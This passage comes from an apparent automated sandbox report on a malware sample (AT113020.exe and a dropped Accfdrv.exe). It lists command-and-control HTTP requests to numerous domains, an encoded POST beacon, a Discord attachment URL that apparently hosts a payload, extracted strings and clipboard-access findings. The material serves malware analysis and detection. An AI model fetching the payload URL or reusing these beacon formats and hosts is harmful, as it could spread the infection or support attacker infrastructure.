Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=73SmHps+05HxyxR+Sls8P85g8AMVj2xb8ZN5KGQQxUczRwjFANvvf8FlZWdGNK7+ujWZ&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.renabbeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=5YbgiWOMvK10e+D+Ti4oKvmTwuSwaKBdeKNLrkVAsRRvF5LwbTMOesGYedm1bG3cJWIa&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.ahomedokita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=W7vyYWXucRnMwWrTc6z6xJ7ly1Aaea5WWr62fhSAhoSHJNEqGWpe7zCBU0dcNM6Zeho8&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.dainikamarsomoy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=AqHI0+MX2ftrVe3DEiYBNVYhM67Z+qKer8sV+OvuybcJEoEJXTUx/oN346XCugNKhu9g&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.kingdomwinecommunity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=rm4JCycf8jgnKzL2gaZxJFxF+HyMTTLQtqzA4xmgqdXyWq3yu1ARpOH0ZAK4rmQWxcAt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.pocketspacer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=8pT0OCjpukmgT2/VEONoh7Jhw41r4itI2gwuQkgKFiQj+4gEMjoX0rzJNNSQA5Q1OcRE&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.cia3mega.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=E4R/8wd6fgEkWdVXGUezTNl/uDJNCiSgqhAFvmJDlfqfpwFCHVrHgZ/vPMmlVzFxpgLt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=DaVCjFuxi8IQ0KSmZmVVzdfbFs8HKa1S3sC5D9GQ7HSGSXmO4QACkgMj7QCmBzxlGckN&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.makingdoathome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=+VDOv2YqGr3HQyUjxvr4ySDa222PNTvrG/MhsshnzvB0EZlKybOlzjmZT3Iubthnocji&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.rodgroup.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: discord.com

Source: unknown

HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.sportsbookmatcher.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sportsbookmatcher.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 4c 36 6c 46 69 57 39 4b 57 6e 51 57 4c 39 6c 62 63 42 37 51 54 59 4a 34 6c 79 6c 78 4c 51 75 72 37 48 74 57 38 52 39 37 6d 61 69 33 67 78 46 5f 57 47 79 68 6d 4d 65 33 51 2d 53 61 5a 53 4a 31 70 55 44 34 57 39 41 64 56 58 36 41 32 63 37 71 7e 43 77 73 31 37 55 43 78 43 61 5f 48 6f 4a 79 54 51 52 37 48 79 6a 67 4b 30 59 73 59 43 45 2d 47 56 31 35 6e 74 75 49 72 54 48 6c 65 66 4f 55 39 66 4d 47 37 72 75 67 36 77 35 54 4d 59 28 73 6b 4d 62 58 6a 59 45 30 6e 61 51 52 61 30 58 42 72 43 44 6a 73 64 71 4b 57 39 62 32 37 72 32 48 57 54 33 4d 69 6b 76 5a 71 50 66 6e 52 64 30 64 35 6d 47 77 79 69 39 4e 7a 50 74 61 76 49 6d 36 4f 42 41 71 51 56 44 56 77 57 4a 7a 28 42 63 6a 49 63 7a 47 75 46 70 38 50 4e 45 56 7e 61 70 61 74 4e 56 57 71 39 70 57 4c 48 58 38 50 37 78 62 77 44 75 34 56 50 56 2d 4b 75 76 6b 63 64 32 69 77 50 42 62 37 49 70 64 75 32 69 5f 43 55 57 59 5a 51 35 4a 6d 77 68 57 54 4f 79 58 28 31 51 5a 35 5f 47 6f 52 65 53 5a 55 65 76 74 52 78 79 67 55 62 79 49 46 4f 48 31 4b 64 53 52 4e 47 63 30 36 46 45 48 50 72 4a 53 33 6a 4f 49 76 49 70 5f 6d 6c 49 79 77 68 69 4c 4d 33 71 70 4e 7a 72 35 77 7a 62 36 48 48 41 43 36 46 4c 4f 7e 75 7a 61 35 2d 58 63 6d 46 39 52 39 48 75 55 4b 75 45 4c 44 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=L6lFiW9KWnQWL9lbcB7QTYJ4lylxLQur7HtW8R97mai3gxF_WGyhmMe3Q-SaZSJ1pUD4W9AdVX6A2c7q~Cws17UCxCa_HoJyTQR7HyjgK0YsYCE-GV15ntuIrTHlefOU9fMG7rug6w5TMY(skMbXjYE0naQRa0XBrCDjsdqKW9b27r2HWT3MikvZqPfnRd0d5mGwyi9NzPtavIm6OBAqQVDVwWJz(BcjIczGuFp8PNEV~apatNVWq9pWLHX8P7xbwDu4VPV-Kuvkcd2iwPBb7Ipdu2i_CUWYZQ5JmwhWTOyX(1QZ5_GoReSZUevtRxygUbyIFOH1KdSRNGc06FEHPrJS3jOIvIp_mlIywhiLM3qpNzr5wzb6HHAC6FLO~uza5-XcmF9R9HuUKuELDQ).

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Dec 2020 09:04:20 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeSet-Cookie: __cfduid=dd71c2ffeca371060d60ef6a8a2fa51701606986259; expires=Sat, 02-Jan-21 09:04:19 GMT; path=/; domain=.sportsbookmatcher.com; HttpOnly; SameSite=LaxVary: Accept-EncodingCF-Cache-Status: DYNAMICcf-request-id: 06c97175430000f9e29ba5c000000001Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=NBSJEqNn0gbaJ38J2hY3l3dlvS1aDl9NUyo4Pg2Eew9SWwTB4dpixC%2BqUkf%2BAdzibOjN5SdHuKhvsj%2BryZQJbGnQKoCK8agM%2BtYj7Dg9xED8qhQOt362mEVg"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 5fbc1e9b9ab3f9e2-PRGData Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 74 36 6b 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9t6k/ was not found on this server.</p></body></html>

Source: AT113020.exe, 00000001.00000003.237565078.00000000007D6000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.co
Source: Accfdrv.exe, 0000000C.00000002.287804141.000000000090B000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000002.287804141.000000000090B000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: AT113020.exe, 00000001.00000003.237565078.00000000007D6000.00000004.00000001.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOECCCertificationAuthority.crl0r
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl0
Source: Accfdrv.exe, 00000005.00000003.272990264.0000000000897000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca7
Source: Accfdrv.exe, 0000000C.00000002.287804141.000000000090B000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca_nu
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp	String found in binary or memory: http://crt.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crt0%
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans/open-sans.eot
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefix
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans/open-sans.otf
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans/open-sans.ttf
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans/open-sans.woff
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans/open-sans.woff2
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/27586/searchbtn.png)
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/27587/BG_2.png)
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/27587/Left.png)
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/27587/Right.png)
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000002.287804141.000000000090B000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca4.com0
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.Rodgroup.net
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: msdt.exe, 00000008.00000002.1016843957.0000000000763000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: msdt.exe, 00000008.00000002.1016843957.0000000000763000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp141
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp1M
Source: msdt.exe, 00000008.00000002.1016843957.0000000000763000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpD?
Source: msdt.exe, 00000008.00000002.1016593743.00000000006C8000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: msdt.exe, 00000008.00000002.1016593743.00000000006C8000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp&P
Source: msdt.exe, 00000008.00000002.1016593743.00000000006C8000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/de-ch/ocid=iehpTP(_t
Source: msdt.exe, 00000008.00000002.1016843957.0000000000763000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/ocid=iehp
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/9t6k/?URflh=
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/All_Inclusive_Vacation_Packages.cfm?fp=5zm8GCCUOjG%2F%2BtWNbnIaevq%2F7pyqIew
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/Credit_Card_Application.cfm?fp=5zm8GCCUOjG%2F%2BtWNbnIaevq%2F7pyqIewWINVaXbd
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/Free_Credit_Report.cfm?fp=5zm8GCCUOjG%2F%2BtWNbnIaevq%2F7pyqIewWINVaXbdLPLIN
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/Online_classifieds.cfm?fp=5zm8GCCUOjG%2F%2BtWNbnIaevq%2F7pyqIewWINVaXbdLPLIN
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/__media__/design/underconstructionnotice.php?d=rodgroup.net
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/__media__/js/trademark.php?d=rodgroup.net&type=ns
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/display.cfm
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/fashion_trends.cfm?fp=5zm8GCCUOjG%2F%2BtWNbnIaevq%2F7pyqIewWINVaXbdLPLIN2DV6
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/px.js?ch=1
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/px.js?ch=2
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/sk-logabpstatus.php?a=azNKanZNU0UxaU9PS2oreG5lOFBSSDFoK05hNy95bzJITFdxcjJUSm
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=
Source: Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp	String found in binary or memory: https://cdn.discordapp.com/?
Source: Accfdrv.exe, 00000005.00000003.272515659.0000000000851000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/K
Source: Accfdrv.exe, 0000000C.00000002.287726771.00000000008C1000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/R
Source: Accfdrv.exe, 0000000C.00000002.287726771.00000000008C1000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/777569443156197399/782882049986920478/Accfcxz
Source: AT113020.exe, 00000001.00000003.237560785.00000000007CF000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/777569443156197399/782882049986920478/Accfcxz&
Source: Accfdrv.exe, 00000005.00000003.272515659.0000000000851000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/c
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp	String found in binary or memory: https://cdn.discordapp.com/o
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1R
Source: AT113020.exe, Accfdrv.exe, Accfdrv.exe, 0000000C.00000002.290227188.0000000004240000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/
Source: AT113020.exe, 00000001.00000002.242538042.00000000040E0000.00000004.00000001.sdmp, Accfdrv.exe, 00000005.00000002.276299189.0000000004073000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000002.290227188.0000000004240000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/S
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://login.live.com/login.srfwa=wsignin1.0&rpsnv=11&ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wrep
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorizeclient_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e3
Source: Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000002.287804141.000000000090B000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: msdt.exe, 00000008.00000002.1016843957.0000000000763000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/chrome/
Source: msdt.exe, 00000008.00000002.1016843957.0000000000763000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/chrome/R?
Source: msdt.exe, 00000008.00000002.1016843957.0000000000763000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/chrome/i?
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0SL

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\AT113020.exe

Code function: 1_2_00440590 OpenClipboard,GlobalAlloc,GlobalLock,EmptyClipboard,SetClipboardData,GlobalUnlock,

1_2_00440590

Contains functionality to read the clipboard data

Source: C:\Users\user\Desktop\AT113020.exe

